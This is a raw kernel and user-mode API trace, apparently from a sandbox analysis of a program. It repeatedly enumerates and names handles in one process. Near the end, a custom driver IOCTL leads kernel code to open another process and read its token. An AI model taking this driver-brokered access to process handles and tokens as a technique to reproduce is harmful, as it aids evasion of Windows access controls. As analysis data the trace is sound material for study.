[0289.804] IoCompleteRequest () returned 0x0 [0289.804] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.804] PsAcquireProcessExitSynchronization () returned 0x0 [0289.804] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.804] ObReferenceObjectByHandle (in: Handle=0x133c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069973440, HandleInformation=0x0) returned 0x0 [0289.804] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.804] PsReleaseProcessExitSynchronization () returned 0x2 [0289.804] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801a9 [0289.804] ObQueryNameString (in: Object=0xffffe00069973440, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.804] ObfDereferenceObject (Object=0xffffe00069973440) returned 0x7ffd [0289.804] IoCompleteRequest () returned 0x0 [0289.804] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.804] PsAcquireProcessExitSynchronization () returned 0x0 [0289.804] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.804] ObReferenceObjectByHandle (in: Handle=0x1360, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069ffac90, HandleInformation=0x0) returned 0x0 [0289.804] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.804] PsReleaseProcessExitSynchronization () returned 0x2 [0289.804] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801a8 [0289.804] ObQueryNameString (in: Object=0xffffe00069ffac90, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.804] ObfDereferenceObject (Object=0xffffe00069ffac90) returned 0x7ff4 [0289.804] IoCompleteRequest () returned 0x0 [0289.804] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.804] PsAcquireProcessExitSynchronization () returned 0x0 [0289.804] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.804] ObReferenceObjectByHandle (in: Handle=0x1390, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007ff73920, HandleInformation=0x0) returned 0x0 [0289.804] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.804] PsReleaseProcessExitSynchronization () returned 0x2 [0289.804] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801a7 [0289.804] ObQueryNameString (in: Object=0xffffe0007ff73920, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.899] ObfDereferenceObject (Object=0xffffe0007ff73920) returned 0x7ffb [0289.899] IoCompleteRequest () returned 0x0 [0289.899] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.899] PsAcquireProcessExitSynchronization () returned 0x0 [0289.899] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.899] ObReferenceObjectByHandle (in: Handle=0x13a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069feccb0, HandleInformation=0x0) returned 0x0 [0289.899] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.899] PsReleaseProcessExitSynchronization () returned 0x2 [0289.899] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801a6 [0289.899] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.899] ObfDereferenceObject (Object=0xffffe00069feccb0) returned 0x8000 [0289.899] IoCompleteRequest () returned 0x0 [0289.899] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.899] PsAcquireProcessExitSynchronization () returned 0x0 [0289.899] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.899] ObReferenceObjectByHandle (in: Handle=0x13b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fef090, HandleInformation=0x0) returned 0x0 [0289.899] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.899] PsReleaseProcessExitSynchronization () returned 0x2 [0289.899] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801a5 [0289.899] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.899] ObfDereferenceObject (Object=0xffffe00069fef090) returned 0x7fff [0289.900] IoCompleteRequest () returned 0x0 [0289.900] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.900] PsAcquireProcessExitSynchronization () returned 0x0 [0289.900] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.900] ObReferenceObjectByHandle (in: Handle=0x13c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b93c80, HandleInformation=0x0) returned 0x0 [0289.900] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.900] PsReleaseProcessExitSynchronization () returned 0x2 [0289.900] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801a4 [0289.900] ObQueryNameString (in: Object=0xffffe00069b93c80, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.900] ObfDereferenceObject (Object=0xffffe00069b93c80) returned 0x7ffe [0289.900] IoCompleteRequest () returned 0x0 [0289.900] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.900] PsAcquireProcessExitSynchronization () returned 0x0 [0289.900] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.900] ObReferenceObjectByHandle (in: Handle=0x1414, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a309c40, HandleInformation=0x0) returned 0x0 [0289.900] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.900] PsReleaseProcessExitSynchronization () returned 0x2 [0289.900] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801a3 [0289.900] ObQueryNameString (in: Object=0xffffe0006a309c40, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.900] ObfDereferenceObject (Object=0xffffe0006a309c40) returned 0x7ffe [0289.900] IoCompleteRequest () returned 0x0 [0289.900] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.900] PsAcquireProcessExitSynchronization () returned 0x0 [0289.900] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.900] ObReferenceObjectByHandle (in: Handle=0x143c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069fd51c0, HandleInformation=0x0) returned 0x0 [0289.900] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.900] PsReleaseProcessExitSynchronization () returned 0x2 [0289.900] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801a2 [0289.900] ObQueryNameString (in: Object=0xffffe00069fd51c0, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.900] ObfDereferenceObject (Object=0xffffe00069fd51c0) returned 0x7fde [0289.900] IoCompleteRequest () returned 0x0 [0289.900] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.900] PsAcquireProcessExitSynchronization () returned 0x0 [0289.900] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.900] ObReferenceObjectByHandle (in: Handle=0x1454, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069af5540, HandleInformation=0x0) returned 0x0 [0289.900] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.900] PsReleaseProcessExitSynchronization () returned 0x2 [0289.900] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801a1 [0289.900] ObQueryNameString (in: Object=0xffffe00069af5540, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.900] ObfDereferenceObject (Object=0xffffe00069af5540) returned 0x7ff1 [0289.900] IoCompleteRequest () returned 0x0 [0289.900] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.901] PsAcquireProcessExitSynchronization () returned 0x0 [0289.901] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.901] ObReferenceObjectByHandle (in: Handle=0x14bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006981f510, HandleInformation=0x0) returned 0x0 [0289.901] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.901] PsReleaseProcessExitSynchronization () returned 0x2 [0289.901] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801a0 [0289.901] ObQueryNameString (in: Object=0xffffe0006981f510, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.901] ObfDereferenceObject (Object=0xffffe0006981f510) returned 0x7ffe [0289.901] IoCompleteRequest () returned 0x0 [0289.901] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.901] PsAcquireProcessExitSynchronization () returned 0x0 [0289.901] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.901] ObReferenceObjectByHandle (in: Handle=0x1514, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a394270, HandleInformation=0x0) returned 0x0 [0289.901] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.901] PsReleaseProcessExitSynchronization () returned 0x2 [0289.901] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8019f [0289.901] ObQueryNameString (in: Object=0xffffe0006a394270, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.901] ObfDereferenceObject (Object=0xffffe0006a394270) returned 0x800e [0289.901] IoCompleteRequest () returned 0x0 [0289.901] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.901] PsAcquireProcessExitSynchronization () returned 0x0 [0289.901] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.901] ObReferenceObjectByHandle (in: Handle=0x1534, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069247ba0, HandleInformation=0x0) returned 0x0 [0289.901] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.901] PsReleaseProcessExitSynchronization () returned 0x2 [0289.901] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8019e [0289.901] ObQueryNameString (in: Object=0xffffe00069247ba0, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.901] ObfDereferenceObject (Object=0xffffe00069247ba0) returned 0x7ffd [0289.901] IoCompleteRequest () returned 0x0 [0289.901] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.901] PsAcquireProcessExitSynchronization () returned 0x0 [0289.901] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.901] ObReferenceObjectByHandle (in: Handle=0x1594, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a0a5090, HandleInformation=0x0) returned 0x0 [0289.901] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.901] PsReleaseProcessExitSynchronization () returned 0x2 [0289.901] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8019d [0289.901] ObQueryNameString (in: Object=0xffffe0006a0a5090, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf380) returned 0xc00000bb [0289.901] ObfDereferenceObject (Object=0xffffe0006a0a5090) returned 0x7f54 [0289.901] IoCompleteRequest () returned 0x0 [0289.901] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.901] PsAcquireProcessExitSynchronization () returned 0x0 [0289.901] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.901] ObReferenceObjectByHandle (in: Handle=0x15cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f3eae0, HandleInformation=0x0) returned 0x0 [0289.901] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.902] PsReleaseProcessExitSynchronization () returned 0x2 [0289.902] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8019c [0289.902] ObQueryNameString (in: Object=0xffffe00069f3eae0, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.902] ObfDereferenceObject (Object=0xffffe00069f3eae0) returned 0x7ffa [0289.902] IoCompleteRequest () returned 0x0 [0289.902] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.902] PsAcquireProcessExitSynchronization () returned 0x0 [0289.902] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.902] ObReferenceObjectByHandle (in: Handle=0x163c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069909d30, HandleInformation=0x0) returned 0x0 [0289.902] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.902] PsReleaseProcessExitSynchronization () returned 0x2 [0289.902] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8019b [0289.902] ObQueryNameString (in: Object=0xffffe00069909d30, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.902] ObfDereferenceObject (Object=0xffffe00069909d30) returned 0x7ffd [0289.902] IoCompleteRequest () returned 0x0 [0289.902] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.902] PsAcquireProcessExitSynchronization () returned 0x0 [0289.902] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.902] ObReferenceObjectByHandle (in: Handle=0x1668, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007e9923a0, HandleInformation=0x0) returned 0x0 [0289.902] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.902] PsReleaseProcessExitSynchronization () returned 0x2 [0289.902] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8019a [0289.902] ObQueryNameString (in: Object=0xffffe0007e9923a0, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.902] ObfDereferenceObject (Object=0xffffe0007e9923a0) returned 0x7ff9 [0289.902] IoCompleteRequest () returned 0x0 [0289.902] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.902] PsAcquireProcessExitSynchronization () returned 0x0 [0289.902] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.902] ObReferenceObjectByHandle (in: Handle=0x16fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006978bdb0, HandleInformation=0x0) returned 0x0 [0289.902] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.902] PsReleaseProcessExitSynchronization () returned 0x2 [0289.902] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80199 [0289.902] ObQueryNameString (in: Object=0xffffe0006978bdb0, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.902] ObfDereferenceObject (Object=0xffffe0006978bdb0) returned 0x7fdc [0289.902] IoCompleteRequest () returned 0x0 [0289.902] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.903] PsAcquireProcessExitSynchronization () returned 0x0 [0289.903] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.903] ObReferenceObjectByHandle (in: Handle=0x174c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bebf20, HandleInformation=0x0) returned 0x0 [0289.903] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.903] PsReleaseProcessExitSynchronization () returned 0x2 [0289.903] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80198 [0289.903] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.903] ObfDereferenceObject (Object=0xffffe00069bebf20) returned 0x7ffc [0289.903] IoCompleteRequest () returned 0x0 [0289.903] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.903] PsAcquireProcessExitSynchronization () returned 0x0 [0289.903] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.903] ObReferenceObjectByHandle (in: Handle=0x1754, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f52590, HandleInformation=0x0) returned 0x0 [0289.903] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.903] PsReleaseProcessExitSynchronization () returned 0x2 [0289.903] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80197 [0289.903] ObQueryNameString (in: Object=0xffffe00069f52590, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.903] ObfDereferenceObject (Object=0xffffe00069f52590) returned 0x7ffe [0289.903] IoCompleteRequest () returned 0x0 [0289.903] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.903] PsAcquireProcessExitSynchronization () returned 0x0 [0289.903] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.903] ObReferenceObjectByHandle (in: Handle=0x1874, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a79cdb0, HandleInformation=0x0) returned 0x0 [0289.903] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.903] PsReleaseProcessExitSynchronization () returned 0x2 [0289.903] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80196 [0289.903] ObQueryNameString (in: Object=0xffffe0006a79cdb0, ObjectNameInfo=0xffffe0006a6dd7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6dd7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.903] ObfDereferenceObject (Object=0xffffe0006a79cdb0) returned 0x7efd [0289.903] IoCompleteRequest () returned 0x0 [0289.903] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.903] PsAcquireProcessExitSynchronization () returned 0x0 [0289.903] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.903] ObReferenceObjectByHandle (in: Handle=0x18a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a7938d0, HandleInformation=0x0) returned 0x0 [0289.903] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.903] PsReleaseProcessExitSynchronization () returned 0x2 [0289.903] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80195 [0289.903] ObQueryNameString (in: Object=0xffffe0006a7938d0, ObjectNameInfo=0xffffe0006a5067c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5067c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.903] ObfDereferenceObject (Object=0xffffe0006a7938d0) returned 0x7fd8 [0289.903] IoCompleteRequest () returned 0x0 [0289.903] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.903] PsAcquireProcessExitSynchronization () returned 0x0 [0289.903] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.903] ObReferenceObjectByHandle (in: Handle=0x18ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a922b10, HandleInformation=0x0) returned 0x0 [0289.903] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.903] PsReleaseProcessExitSynchronization () returned 0x2 [0289.904] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80194 [0289.904] ObQueryNameString (in: Object=0xffffe0006a922b10, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.904] ObfDereferenceObject (Object=0xffffe0006a922b10) returned 0x7ffa [0289.904] IoCompleteRequest () returned 0x0 [0289.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x340) returned 0x188 [0289.904] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0289.904] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069851840, HandleInformation=0x0) returned 0x0 [0289.904] ObOpenObjectByPointer (in: Object=0xffffe00069851840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0289.904] ObfDereferenceObject (Object=0xffffe00069851840) returned 0x4800e [0289.904] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe000738dc100 | out: TokenHandle=0xffffe000738dc100*=0x18c) returned 0x0 [0289.904] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0289.904] IoCompleteRequest () returned 0x0 [0289.904] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 